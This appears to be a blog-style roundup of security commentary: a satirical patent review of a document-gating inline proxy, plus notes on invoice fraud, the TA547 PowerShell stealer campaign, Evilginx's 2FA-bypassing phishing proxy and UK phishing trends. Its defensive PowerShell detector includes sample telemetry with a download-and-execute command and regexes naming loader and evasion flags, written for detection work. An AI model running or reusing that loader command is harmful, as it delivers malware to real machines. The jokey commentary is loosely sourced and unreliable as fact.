Patent US11496512B2
Patent US11483343B2
Patent US20220232015A1 / Preventing cloud-based phishing attacks using shared documents with malicious links
Another patent that promises to revolutionize the thrilling world of network security with US20220232015A1. Brace yourselves for a riveting tale of inline proxies, synthetic requests, and the ever-so-captivating inline metadata generation logic. It’s like the Avengers, but instead of superheroes, we have network security components saving the day.
It’s essentially a glorified bouncer for your corporate network, deciding which document files get to strut down the digital red carpet and which ones get the boot. This system, armed with an inline proxy (because apparently, «inline» makes anything sound more tech-savvy), stands guard between the cloud and the corporate network like a knight in shining armor—except it’s fighting off data packets instead of dragons.
This system doesn’t just blindly swing its sword at anything that moves. Oh no, it’s got finesse. It identifies document files trying to sneak into the corporate network using «various methods and metadata,» which is a fancy way of saying it’s really nosy and likes to snoop around. And then, like a judgy gatekeeper, it categorizes these documents into three cliques: the sanctioned (the cool kids allowed in without a fuss), the blacklisted (the troublemakers permanently exiled to the land of «Access Denied»), and the unknown (the mysterious strangers who need a thorough background check).
The patent goes on to wax poetic about the use of policy-based rules, threat scanning, and sandboxing for those unknown or potentially malicious documents. Because nothing says «cutting-edge technology» like treating every document like it’s a ticking time bomb.
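As an added illustration (my own code, not from the patent or from any product that implements it), here is a toy inline-proxy gate that applies the sanctioned / blacklisted / unknown split above to a single proxied response. The trusted-origin list, the blacklist hash, the sandbox stand-in and the sample files are all constructed assumptions.

```python
"""Added example: a toy inline-proxy gate for document files, following the
sanctioned / blacklisted / unknown split the post describes. Policy inputs,
the sandbox stand-in and the sample files are all constructed here."""
import hashlib
from dataclasses import dataclass
from typing import Optional

# Constructed policy inputs (assumptions, not values from the patent).
SANCTIONED_ORIGINS = {"docs.example-corp.com"}          # trusted cloud origins
BLACKLISTED_SHA256 = {hashlib.sha256(b"%PDF-1.7 known-bad").hexdigest()}

# Identify documents from the first bytes rather than the declared Content-Type,
# which an attacker (or a careless server) controls.
MAGIC = {
    b"%PDF": "pdf",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2",   # legacy .doc/.xls/.ppt
    b"PK\x03\x04": "zip-container",                # OOXML .docx/.xlsx or a plain zip
}

@dataclass
class Verdict:
    category: str   # sanctioned | blacklisted | unknown | not-a-document
    action: str     # allow | block
    scanned: bool   # True when the decision came from the sandbox step

def identify_document(content_type: str, body: bytes) -> Optional[str]:
    """Return a document kind, or None when the response is not a document."""
    for magic, kind in MAGIC.items():
        if body.startswith(magic):
            return kind
    # Declared type is the weaker signal; honour it only for explicit document types.
    if content_type in ("application/pdf", "application/msword"):
        return "declared-" + content_type.split("/", 1)[1]
    return None

def sandbox_scan(body: bytes) -> bool:
    """Stand-in for the threat-scanning / sandboxing step (constructed, not a real engine)."""
    # Treat embedded PDF JavaScript or an Office macro stream as malicious.
    return b"/JavaScript" in body or b"vbaProject.bin" in body

def gate(origin_host: str, content_type: str, body: bytes) -> Verdict:
    """Decide what the inline proxy does with one response carrying a file."""
    if identify_document(content_type, body) is None:
        return Verdict("not-a-document", "allow", False)
    # Blacklist wins even over a sanctioned origin: a trusted share can host a bad file.
    if hashlib.sha256(body).hexdigest() in BLACKLISTED_SHA256:
        return Verdict("blacklisted", "block", False)
    if origin_host in SANCTIONED_ORIGINS:
        return Verdict("sanctioned", "allow", False)
    # Unknown documents earn no trust from reputation; they are scanned first.
    return Verdict("unknown", "block" if sandbox_scan(body) else "allow", True)
```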
Let’s dive into this page-turner, shall we?
First off, we have the «Network Security System,» a groundbreaking invention that—hold your applause—acts as a middleman between clients and cloud applications. Because if there’s anything we need, it’s more intermediaries in our lives, right? This system is so dedicated to enhancing security in cloud-based environments that it practically wears a cape.
Next up, «Synthetic Request Generation.» The system doesn’t just handle requests; oh no, it creates its own. Because why wait for trouble when you can conjure it up yourself? It’s like inviting a vampire into your house just to see if your garlic wreath works.
And let’s not forget the «Inline Metadata Generation Logic.» This isn’t just any logic; it’s inline, which means… something very important, no doubt. It’s configured to issue synthetic requests, adding an extra layer of complexity because, clearly, what our lives lack is complexity.
Then there’s the «Separate Synthetic Requests.» Because why have one type of synthetic request when you can have two? Variety is the spice of life, after all. This technology is like having a decoy duck in a pond full of real ducks, except the ducks are data, and no one’s really sure why we need the decoy in the first place.
Ah, «Cloud Policy Enforcement,» the pièce de résistance. The synthetic request injection is used to retrieve metadata for cloud policy enforcement, suggesting that, yes, we can enforce policies in cloud applications. Because if there’s one thing cloud applications were missing, it was more policies.
Now, for the grand finale: the benefits and drawbacks.
Benefits:
🗣"Enhanced Security»: Because before this patent, everyone was just winging it.
🗣"Proactive Threat Detection»: It’s like Minority Report for your network, but without Tom Cruise.
🗣"Dynamic Policy Enforcement»: Finally, a way to enforce those policies dynamically. Static policy enforcement is so 2020.
🗣"Efficiency»: Because nothing says efficiency like generating synthetic requests to test your own system.
🗣"Stability and Consistency»: Because if there’s one thing we crave in the fast-paced world of IT, it’s stability. Yawn.
Drawbacks:
🗣"Complexity»: Who would’ve thought adding several layers of synthetic requests and metadata logic would make things more complex?
🗣"False Positives/Negatives»: Surprise! The system that invents its own problems sometimes gets it wrong.
🗣"Maintenance and Updates»: Because the one thing IT departments complain about not having enough of is maintenance work.
🗣"User Experience Impact»: Because nothing enhances user experience quite like being told your legitimate document is a security threat.
🗣"Over-Reliance on Known Threats»: Because who needs to worry about unknown threats when you can just keep focusing on the ones you already know?
So there you have it, folks. Patent US20220232015A1 is set to revolutionize the way we think about network security, turning the mundane task of document file management into a saga worthy of its own epic trilogy. Move over, Lord of the Rings; there’s a new tale of adventure in town, complete with inline proxies, metadata, and the ever-thrilling sandboxing. Who knew network security could be so… exhilarating?
FBI IC3
Attackers are employing a variety of methods, including phishing emails with malicious attachments, obfuscated script files, and GuLoader PowerShell, to infiltrate and compromise victim systems. Invoice fraud, a form of business email compromise (BEC), is one of the popular methods used by attackers to deceive victims. In this type of scam, a third party fraudulently requests payment, often by impersonating a legitimate vendor.
Invoice scams pose a significant threat to businesses, as they can result in substantial financial losses and irreparable damage. According to the FBI IC3 report, in 2022, BEC attacks caused $2.7 billion in losses to US victims, and invoice fraud is the most pervasive form of business email compromise.
Some indicators of fraudulent email invoices include requests for personally identifiable information (PII), unusual requests such as changes to banking or payment information, and invoices with unusual dollar amounts. Additionally, attackers often use obfuscation techniques to evade defenses and make their malicious activities more difficult to detect.
TA547 phishing campaign
The TA547 phishing campaign using the Rhadamanthys stealer represents a significant evolution in cybercriminal tactics, notably through the integration of AI-generated scripts. This development serves as a critical reminder for organizations to continuously update and adapt their cybersecurity strategies to counter sophisticated and evolving threats.
Key Details of the Attack
📌Impersonation and Email Content: The phishing emails were crafted to impersonate the German company Metro AG, presenting themselves as invoice-related communications. These emails contained a password-protected ZIP file, which when opened, triggered a remote PowerShell script.
📌Execution Method: The PowerShell script executed directly in memory, deploying the Rhadamanthys stealer without writing to the disk. This method helps avoid detection by traditional antivirus software.
📌Use of AI in Malware Creation: There is a strong indication that the PowerShell script was generated or at least refined using a large language model (LLM). The script featured grammatically correct and highly specific comments, which is atypical for human-generated malware scripts.
Evolving Tactics and Techniques
📌Innovative Lures and Delivery Methods: The campaign also experimented with new phishing tactics, such as voice message notifications and SVG image embedding, to enhance the effectiveness of credential harvesting attacks.
📌AI and Cybercrime: The use of AI technologies like ChatGPT or Copilot in scripting the malware indicates a significant shift in cybercrime tactics, suggesting that cybercriminals are increasingly leveraging AI to refine their attack methods.
📌Broader Implications: This campaign not only highlights the adaptability and technical sophistication of TA547 but also underscores the broader trend of cybercriminals integrating AI tools into their operations. This integration could potentially lead to more effective and harder-to-detect cyber threats.
Recommendations for Defense
📌Employee Training: Organizations should enhance their cybersecurity defenses by training employees to recognize phishing attempts and suspicious email content.
📌Technical Safeguards: Implementing strict group policies to restrict traffic from unknown sources and ad networks can help protect endpoints from such attacks.
📌Behavior-Based Detection: Despite the use of AI in crafting attacks, behavior-based detection mechanisms remain effective in identifying and mitigating such threats.
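To show what «behavior-based detection» means for the delivery chain described above (archive opened by a user, PowerShell fetching and running a script in memory), here is an added example of my own, not code from the TA547 report or any vendor. It scores constructed process-creation events in the shape of Sysmon Event ID 1; the parent-process set, the patterns and the sample telemetry are assumptions.

```python
"""Added example: behaviour-based detection of in-memory PowerShell loaders over
constructed process-creation events (Sysmon Event ID 1 style). It keys on what
the process does and where it was launched from, not on a script hash, so a
reworded (or LLM-polished) script still trips it."""
import re
from typing import Dict, List

# Behaviours that fetch or evaluate code without touching disk.
IN_MEMORY_LOADERS = re.compile(
    r"(invoke-expression|\biex\b|downloadstring|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|\birm\b|net\.webclient|frombase64string)", re.I)
# Flags that hide the window, bypass policy or hide the command text.
EVASION_FLAGS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass)", re.I)
# Parents that mean "a user just opened something", e.g. an archive or a mail client.
USER_CONTEXT_PARENTS = {"explorer.exe", "outlook.exe", "7zfm.exe", "winrar.exe", "wscript.exe"}

def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like an in-memory loader; empty means benign."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    reasons = []
    if IN_MEMORY_LOADERS.search(cmd):
        reasons.append("downloads or evaluates code in memory")
    if parent in USER_CONTEXT_PARENTS:
        reasons.append(f"spawned from user context: {parent}")
    if EVASION_FLAGS.search(cmd):
        reasons.append("evasion flags (hidden window / encoded / policy bypass)")
    # Alert only on a loader behaviour plus corroboration: admin scripts use
    # -ep bypass routinely, and a user-launched PowerShell alone is normal.
    loader = reasons and reasons[0].startswith("downloads")
    return reasons if loader and len(reasons) >= 2 else []

def detect(events: List[Dict[str, str]]) -> List[int]:
    """Indexes of events that should raise an alert."""
    return [i for i, ev in enumerate(events) if score_event(ev)]

# Constructed sample telemetry, not real logs; the URL uses a documentation range.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/x.ps1')\""},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"pwsh -ep bypass -File C:\scripts\patch-rollout.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
]
```

Only the first sample event raises an alert; the scheduled admin script with `-ep bypass` does not, because it neither fetches code nor runs from a user context.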
Evilginx + GoPhish
The article from BreakDev discusses the integration of Evilginx 3.3 with GoPhish, a significant update to the toolset. Together, the Evilginx changes and the GoPhish integration give users more sophisticated tools for creating and managing phishing campaigns, with enhanced customization and tracking capabilities.
Here are the key points and new features introduced:
📌Integration with GoPhish: Evilginx now officially integrates with GoPhish by Jordan Wright. This collaboration allows users to create phishing campaigns that send emails with valid Evilginx lure URLs, leveraging GoPhish’s user interface to monitor the campaign’s effectiveness, including email opens, lure URL clicks, and successful session captures.
📌API Enhancements: The update has introduced additional API endpoints in GoPhish, enabling changes to the results status for every sent email. This improvement facilitates more dynamic and responsive campaign management.
📌Lure URL Generation: In the new workflow, when creating a campaign in GoPhish, users no longer select a «Landing Page.» Instead, they generate a lure URL in Evilginx and input it into the «Evilginx Lure URL» text box. This process streamlines the creation of phishing campaigns.
📌Custom Parameters and Personalization: GoPhish automatically generates encrypted custom parameters with personalized content for each link embedded in the generated email messages. These parameters include the recipient’s first name, last name, and email. This feature allows for the customization of phishing pages through js_inject scripts, enhancing the effectiveness of phishing attempts.
📌Expanded TLD Support: Evilginx has expanded its support for new Top-Level Domains (TLDs) to improve the efficiency of URL detection in proxied packets. This update aims to better differentiate between phishing and original domains by recognizing URLs ending with a broader range of known TLDs. The updated list includes a variety of TLDs, such as .aero, .arpa, .biz, .cloud, .gov, .info, .net, .org, and many others, including all known 2-character TLDs.
Evilginx and GoPhish are tools used in cybersecurity, particularly in the context of phishing simulations and man-in-the-middle (MitM) attack frameworks. They serve different purposes but can be used together to enhance phishing campaigns and security testing.
📌Evilginx is a man-in-the-middle attack framework that can bypass two-factor authentication (2FA) mechanisms.
- It works by tricking a user into visiting a proxy site that looks like the legitimate site they intend to visit. As the user logs in and completes the 2FA challenge, Evilginx captures the user’s login information and the authentication token.
- This method allows the attacker to replay the token and access the targeted service as the user, effectively bypassing 2FA protections.
📌GoPhish is an open-source phishing toolkit designed for businesses and security professionals to conduct security awareness training and phishing simulation exercises.
- It allows users to create and track the effectiveness of phishing campaigns, including email opens, link clicks, and data submission on phishing pages.
Phishing in UK
Phishing attacks are on the rise in the UK, and it seems our cybercriminal friends have been busy updating their deception toolkit. They’re no longer just sending out those fancy «I’m the deposed prince» emails. No, they have switched to high technology, plunging into the exciting world of QR phishing (or «quishing», because apparently everything is better with «q») and even enlisting artificial intelligence to write ever more convincing fraudulent emails.
And for those who thought QR codes were just a harmless way to download a restaurant menu, think again. They’re the new golden ticket for scammers on social media, preying on the unsuspecting masses looking for concert tickets or the next big sale. Meanwhile, AI is making it easier than ever to fake someone’s identity, because who needs real fingerprints or faces anymore?
Let’s start with the classic «vishing» call centers, where enterprising scammers in Ukraine and the Czech Republic put on their best British accents to convince you to send them a bit of pocket change—just tens of millions of euros. Who knew that the voice on the other end of the phone asking for your bank details was actually Boris in Praha, not Barclays in Knightsbridge?
Then there’s the hospitality hustle, where hotel employees are duped by emails that are about as genuine as a three-pound note. Click on this link, and voila! You’ve just given a hacker a five-star stay in your computer system.
And let’s not forget the good old United States Postal Service, or as the scammers would have it, the «United Scams Phishing Service.» They’ve been sending out emails that are so convincing you’d think Mr. Postman himself was asking for your details. Except instead of delivering parcels, they’re parceling out your personal info to the highest bidder.
Over in the world of UK transport, it seems some employees couldn’t spot a phishing attack if it came with a side of chips. An email with a fake portal link was all it took to turn their mailboxes into an all-you-can-eat data buffet.
But wait, there’s more! The latest trend is «quishing,» where QR codes are the new black for cyber swindlers. Because nothing says «trust me» like scanning a mysterious barcode that promises a package delivery but delivers a package of malware instead.
Law firms aren’t immune to the phishing frenzy either. One click on a dodgy link, and suddenly you’re not just practicing law, you’re practicing how to explain to your clients why their confidential information is now trending on the dark web.
Job seekers, beware the WhatsApp wiles, where scammers are offering you the job of a lifetime—so long as your lifetime dream was to be part of a fraud scheme.
Small businesses, you are not too small to be noticed! In fact, you are the star of the show: a whopping 82% of online threats concern only you. And let’s applaud the 464% increase in the number of phishing attacks in your industry.
And who is on the front line of the fight against this digital epidemic? The National Cyber Security Center (NCSC) and Action Fraud, armed with their powerful resources, are helping the public report these dastardly acts. Because nothing says «we have everything under control» like a government website and a hotline.
The UK government has rolled out the red carpet for the «world’s first» charter with tech giants, promising to block and remove fraudulent content. Because if there’s one thing that will deter scammers, it’s a clearly worded team agreement with the National Crime Agency (NCA) and the Cybercrime Division.
Education and awareness are touted as «silver bullets» against this growing threat. Various organizations offer phishing awareness courses because watching a PowerPoint presentation is a sure way to defeat sophisticated cybercriminals. And let’s not forget about international cooperation, because phishing, like a severe cold, knows no boundaries.
So, as we wrap up this festive phishing roundup, remember: if it looks like a scam and smells like a scam, it’s probably just another day on the internet. Keep your wits about you, and maybe don’t click on that link from «Her Majesty’s Secret Service» promising you a tax refund in Poundcoin.
Blizzard attacks
«Star Blizzard» should not be confused with a celestial weather phenomenon or a limited-edition threat from the Dairy Queen. This saga takes place in a digital space where the only snowflakes are the unique identifiers of each hacked system.
Consider the audacity of Star Blizzard, which conducts targeted social engineering attacks over Microsoft Teams, turning ready-made infrastructure against anyone who uses it. The group has been doing this since November 2023, remaining unnoticed until January 12, 2024. And not just sneaking around, but camping, making a bonfire in your digital backyard while you serenely watched your favorite TV series.
❇️Imagine, if you will, the finance industry, with all its high-stakes and even higher egos, getting a digital pie to the face courtesy of our mischievous friends at Star Blizzard. «Oh, what’s this? Another 'urgent' wire transfer request from the CEO who’s currently on a safari? Sure, let’s expedite that!»
❇️Then there’s the healthcare sector, tirelessly working to save lives, only to have their systems held hostage by a cyberattack. «We’ve encrypted your files, but think of this as a team-building exercise. How quickly can you work together to get them back?» It’s like a game of Operation, but the only buzzing sound is the collective panic of the IT department.
❇️Let’s not forget the government agencies, those bastions of bureaucracy, where a single phishing email can lead to exactly the kind of chaos you’d expect. «Oops, did we accidentally leak classified documents? Our bad. But hey, transparency is important, right?»
❇️And of course, the retail industry, where the point-of-sale systems are as vulnerable as a house of cards in a wind tunnel. «Black Friday sale! Everything must go! Including your credit card details!»
In the world of cybersecurity, where the stakes are high and the attackers are always looking for the next weak link, it’s a wonder that any industry can keep a straight face. So, let’s all have a nervous chuckle and then maybe, just maybe, update those passwords.